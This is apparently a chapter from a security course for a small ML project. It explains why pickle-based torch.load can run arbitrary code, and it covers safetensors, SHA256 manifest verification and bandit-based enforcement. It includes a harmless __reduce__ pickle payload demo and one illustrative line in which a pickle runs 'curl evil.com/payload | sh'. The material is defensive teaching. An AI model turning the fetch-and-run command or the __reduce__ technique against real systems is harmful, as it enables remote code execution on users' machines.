02 — Supply chain: pickle, safetensors, MANIFEST.json
The supply chain is everything we load from disk: model weights, tokenizer, RAG indexes.
pickle is a serialized Python interpreter: torch.load(untrusted_path) can execute arbitrary code, by design. The alternative is safetensors (data only, no code) plus a MANIFEST.json with a SHA256 per artifact, verified by scripts/verify_artifacts.sh before any load.
What "supply chain" means for this system
Every persisted artifact loaded at runtime is part of the supply chain:
| Artifact | Path (per phases 11–32) | Risk class |
|---|---|---|
| Tokenizer (BPE merges + vocab) | artifacts/tokenizer/ | Medium (JSON; integrity-only) |
| Model weights | artifacts/checkpoints/mini-gpt-grammar.{pt,safetensors} | High (deserialization) |
| RAG embeddings index | artifacts/rag/index/ | Medium (binary; integrity-only) |
| RAG knowledge-base chunks | data/kb/grammar-rules/chunks.jsonl | Medium (JSON; content-integrity) |
| Hypothesis fuzz corpus | .hypothesis/ | Low (test-time only) |
The "supply chain" is the answer to: if I trust nothing about who put these files on disk, what can go wrong?
Pickle: the worst-case load
Python's pickle is not a data format; it's a serialized program. When you call pickle.load(f), the pickle VM walks a sequence of opcodes that can:
- Allocate objects.
- Call arbitrary callables (including os.system, subprocess.run, eval).
- Import arbitrary modules.
A pickle byte sequence that calls os.system("curl evil.com/payload | sh") during deserialization is trivial to construct. There is no flag to "load data only" — that's not what pickle does.
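To make "serialized program" concrete, here is a deliberately harmless payload. The class name Payload is hypothetical; the mechanism is the standard __reduce__ hook, which tells pickle to call a callable with arguments at load time. Where a real attacker would put os.system, this sketch only asks for the current process ID.

```python
import os
import pickle
import pickletools


class Payload:
    """Hypothetical hostile object: __reduce__ tells pickle what to call on load."""

    def __reduce__(self):
        # (callable, args): the unpickler will call eval(...) inside loads().
        # Harmless here: it only imports os and returns the current PID.
        return (eval, ("__import__('os').getpid()",))


blob = pickle.dumps(Payload())

# Loading runs the embedded call; the loader does not even need the Payload class.
result = pickle.loads(blob)
print(result == os.getpid())  # True: code ran during deserialization

# The opcode stream contains a global lookup of builtins.eval and a REDUCE (call) step.
opcodes = [op.name for op, _arg, _pos in pickletools.genops(blob)]
print("REDUCE" in opcodes)
```

Running pickletools.dis(blob) prints the same stream in readable form; nothing in it looks like "data".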
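torch.load wraps pickle. On PyTorch releases before 2.6, where weights_only defaulted to False, or whenever weights_only=False is passed explicitly, it runs the full unpickler:

```python
import torch

# Hostile checkpoint downloaded from a model hub.
# `model` is an nn.Module defined elsewhere.
state = torch.load("downloaded.pt", weights_only=False)  # ← arbitrary code executes here
model.load_state_dict(state)  # ← by the time this runs, the payload already has
```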
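On that path, the chance of RCE on torch.load(untrusted_path) is 100% if the file is hostile. Not "it depends on the model architecture." Not "if you have weird tensors." A hostile file is defined as one that runs code on load; the file format permits it; the loader honors it. weights_only=True (the default since PyTorch 2.6) narrows the unpickler to an allowlist of types, but that is a restriction in the loader, not a property of the format, which is why the enforcement policy still prefers safetensors.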
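Roughly speaking, weights_only=True swaps in an unpickler that only resolves an allowlist of globals. The standard library supports the same idea by overriding pickle.Unpickler.find_class (the "Restricting Globals" section of the pickle documentation). A minimal sketch with a hypothetical allowlist and hypothetical helper names (RestrictedUnpickler, restricted_loads): it shows why an allowlist stops a __reduce__-style payload, and also that it is only as safe as what it allows.

```python
import collections
import io
import pickle

# Hypothetical allowlist: only these (module, name) globals may be resolved.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Every global reference in the stream (GLOBAL / STACK_GLOBAL) goes through here.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class EvalPayload:
    # The attacker's trick, with a harmless expression for the demo.
    def __reduce__(self):
        return (eval, ("1 + 1",))


# Plain data and allowlisted types still load.
ok = restricted_loads(pickle.dumps(collections.OrderedDict(a=[1, 2])))
print(ok)

# The payload is rejected before eval is ever called.
try:
    restricted_loads(pickle.dumps(EvalPayload()))
    rejected = None
except pickle.UnpicklingError as exc:
    rejected = str(exc)
print(rejected)  # forbidden global: builtins.eval
```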
What "untrusted path" means
The path is untrusted if any of the following hold:
- The file was downloaded from a public hub (Hugging Face, Civitai, a random GitHub release).
- The file was emailed, dropped into a shared drive, or attached to a PR.
- The file is on a host another user can write to without your review.
- The file was downloaded a year ago; you don't remember verifying it.
Trust is a property of provenance and integrity, not of the act of having the file on disk.
Safetensors: data only, no code
safetensors is a format designed specifically to be safe to deserialize:
- The file starts with an 8-byte little-endian header length, followed by a JSON header: tensor name → {dtype, shape, data_offsets}, plus an optional __metadata__ map of strings.
- The body is raw bytes for each tensor, in the declared dtype/shape.
- The loader never instantiates Python objects beyond plain tensors.
There is no opcode, no callable, no import, no __reduce__. The loader reads bytes into a tensor. End of trust boundary.
```python
from safetensors.torch import load_file

state = load_file("downloaded.safetensors")  # just tensors, no code path to RCE
```
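Because the format is just a length prefix, a JSON header, and raw bytes, the header can be inspected with the standard library alone, without importing torch or running anything from the file. A minimal sketch for illustration, not a replacement for the safetensors library: read_safetensors_header and DTYPE_SIZES are hypothetical names, the dtype table covers only common tags, and the single check here (each tensor's byte range must fit the buffer and match dtype × shape) is a subset of what the real loader validates.

```python
import json
import struct

# Bytes per element for common safetensors dtype tags (subset, for illustration).
DTYPE_SIZES = {"F64": 8, "F32": 4, "F16": 2, "BF16": 2,
               "I64": 8, "I32": 4, "I16": 2, "I8": 1, "U8": 1, "BOOL": 1}


def read_safetensors_header(blob: bytes) -> dict:
    """Parse and sanity-check a safetensors header. Never executes file content."""
    if len(blob) < 8:
        raise ValueError("file too short for the 8-byte header length")
    (header_len,) = struct.unpack("<Q", blob[:8])  # little-endian u64
    if 8 + header_len > len(blob):
        raise ValueError("declared header length exceeds file size")
    header = json.loads(blob[8:8 + header_len].decode("utf-8"))
    buffer_len = len(blob) - 8 - header_len

    for name, info in header.items():
        if name == "__metadata__":  # optional str -> str map, no tensor data
            continue
        if info["dtype"] not in DTYPE_SIZES:
            raise ValueError(f"{name!r}: unsupported dtype {info['dtype']!r}")
        begin, end = info["data_offsets"]  # relative to the start of the byte buffer
        numel = 1
        for dim in info["shape"]:
            numel *= dim
        expected = numel * DTYPE_SIZES[info["dtype"]]
        if not (0 <= begin <= end <= buffer_len) or end - begin != expected:
            raise ValueError(f"{name!r}: data_offsets do not match dtype/shape")
    return header


# Build a tiny file by hand: one F32 tensor "w" with shape [2].
data = struct.pack("<2f", 1.0, 2.0)
hdr = json.dumps({"w": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]}}).encode()
blob = struct.pack("<Q", len(hdr)) + hdr + data
print(read_safetensors_header(blob)["w"])

# A header that lies about the shape (3 floats declared, 8 bytes stored) is rejected.
lying = json.dumps({"w": {"dtype": "F32", "shape": [3], "data_offsets": [0, 8]}}).encode()
try:
    read_safetensors_header(struct.pack("<Q", len(lying)) + lying + data)
    lying_error = None
except ValueError as exc:
    lying_error = str(exc)
print(lying_error)
```

This catches a header that lies about sizes, but not weights with the right shape and bad values.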
A hostile .safetensors file can still lie about its contents — wrong shape, wrong values, NaN-poisoned weights that degrade quality. That's an integrity attack, not an RCE. Caught downstream by:
- Shape checks at load_state_dict.
- MANIFEST.json SHA256 verification (below).
- Behavioral tests after load (Phase 20's harness will flag a degraded model).
Trade: safetensors gives up the convenience of "pickle anything Python can pickle" and gains a hard guarantee against RCE-on-load.
MANIFEST.json: integrity for everything else
Even with safetensors, you still need to know: is this file the one I expect, or was it swapped?
Phase 18 emits MANIFEST.json at the end of each training run:
```json
{
  "generated_at": "2026-05-22T14:31:08Z",
  "git_sha": "a1b2c3d…",
  "artifacts": [
    {
      "path": "artifacts/checkpoints/mini-gpt-grammar.safetensors",
      "sha256": "8f2a…cc91",
      "bytes": 4194304,
      "role": "model-weights"
    },
    {
      "path": "artifacts/tokenizer/vocab.json",
      "sha256": "1d3c…0a87",
      "bytes": 16384,
      "role": "tokenizer-vocab"
    },
    {
      "path": "data/kb/grammar-rules/chunks.jsonl",
      "sha256": "4e7b…b21f",
      "bytes": 102400,
      "role": "rag-kb"
    }
  ]
}
```
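A minimal sketch of how a training run could emit a manifest in this shape. The function names (sha256_file, build_manifest) and the list of (path, role) pairs are hypothetical; the actual Phase 18 code may differ. The git SHA is passed in rather than read from git so the sketch stays self-contained.

```python
import hashlib
import json
import tempfile
from datetime import datetime, timezone
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large checkpoints never sit fully in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path, entries: list[tuple[str, str]], git_sha: str) -> dict:
    """entries: (path relative to root, role) pairs."""
    artifacts = []
    for rel_path, role in entries:
        full = Path(root) / rel_path
        artifacts.append({
            "path": rel_path,
            "sha256": sha256_file(full),
            "bytes": full.stat().st_size,
            "role": role,
        })
    return {
        "generated_at": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "git_sha": git_sha,
        "artifacts": artifacts,
    }


# Usage: one small artifact in a throwaway directory.
with tempfile.TemporaryDirectory() as tmp:
    vocab = Path(tmp, "artifacts/tokenizer/vocab.json")
    vocab.parent.mkdir(parents=True)
    vocab.write_text('{"a": 0}', encoding="utf-8")
    manifest = build_manifest(Path(tmp), [("artifacts/tokenizer/vocab.json", "tokenizer-vocab")],
                              git_sha="deadbeef")
    Path(tmp, "MANIFEST.json").write_text(json.dumps(manifest, indent=2), encoding="utf-8")
print(manifest["artifacts"][0])
```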
scripts/verify_artifacts.sh (Lab 04):
- Walks artifacts[].
- For each entry, computes sha256sum <path>.
- Compares the result to the stored sha256.
- Exits 0 if all match. Exits non-zero with a clear message naming the mismatched file.
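Lab 04's script is shell, but the same four steps fit in a short Python function, which is handy if the loader process should re-check a file right before opening it. A sketch with hypothetical names (verify_manifest, main); it assumes manifest paths are relative to a root directory. To use it as a CLI, wire main() to sys.exit.

```python
import hashlib
import json
import sys
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_manifest(manifest_path: Path, root: Path) -> list[str]:
    """Return one message per artifact that is missing or whose SHA256 differs."""
    manifest = json.loads(Path(manifest_path).read_text(encoding="utf-8"))
    errors = []
    for entry in manifest["artifacts"]:  # walk artifacts[]
        path = Path(root) / entry["path"]
        if not path.is_file():
            errors.append(f"MISSING {entry['path']}")
            continue
        actual = sha256_file(path)  # same digest `sha256sum <path>` prints
        if actual != entry["sha256"]:  # compare to the stored hash
            errors.append(f"MISMATCH {entry['path']}: expected {entry['sha256']}, got {actual}")
    return errors


def main(manifest_path: str = "MANIFEST.json", root: str = ".") -> int:
    errors = verify_manifest(Path(manifest_path), Path(root))
    for msg in errors:
        print(msg, file=sys.stderr)  # name every bad file
    return 1 if errors else 0  # 0 only if every artifact matches


# Usage: verify a clean file, then simulate a swapped chunks.jsonl.
with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp)
    (root / "chunks.jsonl").write_bytes(b'{"id": 1}\n')
    manifest = {"artifacts": [{"path": "chunks.jsonl",
                               "sha256": hashlib.sha256(b'{"id": 1}\n').hexdigest(),
                               "bytes": 10, "role": "rag-kb"}]}
    (root / "MANIFEST.json").write_text(json.dumps(manifest), encoding="utf-8")
    clean_status = main(str(root / "MANIFEST.json"), str(root))
    (root / "chunks.jsonl").write_bytes(b'{"id": 666}\n')  # poisoned replacement
    tampered_errors = verify_manifest(root / "MANIFEST.json", root)
print(clean_status, tampered_errors)
```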
This catches:
- Bit rot on disk.
- An attacker swapping chunks.jsonl for a poisoned version.
- A teammate accidentally overwriting weights with an older checkpoint.
It does not catch:
- An attacker who also rewrites MANIFEST.json. (Mitigation: GPG-sign MANIFEST.json and store the public key out-of-band. Phase 37's lab leaves signing as a stretch goal.)
- Logic bugs in the artifacts. (Mitigation: behavioral tests, Phase 20.)
The manifest is a tripwire, not a fortress. But it's a cheap tripwire that catches the common cases (rot, accidental overwrite, naive tampering).
The threat in numbers
A quick sanity check, not a measurement:
- Probability that a random hub checkpoint is hostile: low but non-zero. Documented incidents exist (PoisonGPT, public bandit-scanner findings on HF in 2023–2024).
- Severity if a hostile checkpoint runs: 5/5 (full RCE on the host as the user running the load).
- Detection probability without tooling: ~0% (nothing visible during load).
- Detection probability with MANIFEST.json + a safetensors-only policy: high for naive tampering, moderate for sophisticated tampering (the attacker must compromise both the file and the manifest, plus the signing key if the manifest is signed).
Residual risk after the policy: low for this single-user, local-only deployment. Higher for any multi-user deployment, which Phase 37 explicitly does not cover.
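These bullets combine the way the next chapter's matrix does: risk is probability times severity times the chance of going undetected. Using only the figures stated above:

$$
R = p \cdot s \cdot (1 - d)
$$

Without tooling, s = 5 and d ≈ 0, so R ≈ 5p: the whole risk is the low-but-nonzero hub-hostility probability at maximum severity. The manifest check raises d; the safetensors-only rule additionally removes the RCE path, so whatever slips past the manifest is an integrity problem rather than a 5/5 one.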
The enforcement: bandit + custom rule
The policy "no pickle-based loads in agent code" is enforced two ways:
- bandit rule B301: flags pickle.load and friends in src/.
- Custom rule: flags torch.load( without an explicit weights_only=True argument. (Even with weights_only=True, prefer safetensors; the flag is defense-in-depth, not the primary defense.)
just security runs both as part of CI. A new use of pickle requires a per-line # nosec with a justification comment, code review, and an entry in security/THREATS.md.
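The custom rule can be a small AST pass. A sketch with a hypothetical function name (find_unsafe_torch_loads): it only recognizes the literal torch.load(...) spelling, so aliases such as `import torch as t` or `from torch import load` would need extra handling, and it treats anything other than a literal weights_only=True (a variable, **kwargs, False) as unsafe.

```python
import ast


def _is_torch_load(func: ast.expr) -> bool:
    # Matches the attribute call `torch.load`, nothing else.
    return (isinstance(func, ast.Attribute) and func.attr == "load"
            and isinstance(func.value, ast.Name) and func.value.id == "torch")


def _has_weights_only_true(call: ast.Call) -> bool:
    for kw in call.keywords:
        if kw.arg == "weights_only":
            return isinstance(kw.value, ast.Constant) and kw.value.value is True
    return False


def find_unsafe_torch_loads(source: str, filename: str = "<src>") -> list[tuple[str, int]]:
    """Return (filename, line) for every torch.load call lacking weights_only=True."""
    tree = ast.parse(source, filename=filename)
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _is_torch_load(node.func) \
                and not _has_weights_only_true(node):
            hits.append((filename, node.lineno))
    return sorted(hits)


demo_src = (
    "import torch\n"
    "a = torch.load('a.pt')\n"
    "b = torch.load('b.pt', weights_only=True)\n"
    "c = torch.load('c.pt', weights_only=False)\n"
)
hits = find_unsafe_torch_loads(demo_src, filename="<demo>")
print(hits)  # [('<demo>', 2), ('<demo>', 4)]
```

In CI, a recipe would run this over every file in src/ and fail on any hit not covered by a reviewed exception.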
One-paragraph recap
The model-load path is the single highest-severity supply-chain risk in any ML system: torch.load on an untrusted pickle is RCE by design. The fix is two-layered: switch to safetensors (no code path to execute) and verify everything against MANIFEST.json SHA256 hashes (catch tampering and rot). Enforcement is via bandit + a custom rule, with scripts/verify_artifacts.sh as the runtime tripwire.
Next: theory/03-threat-modeling-numbers.md — the prob × severity × (1 − detection) matrix.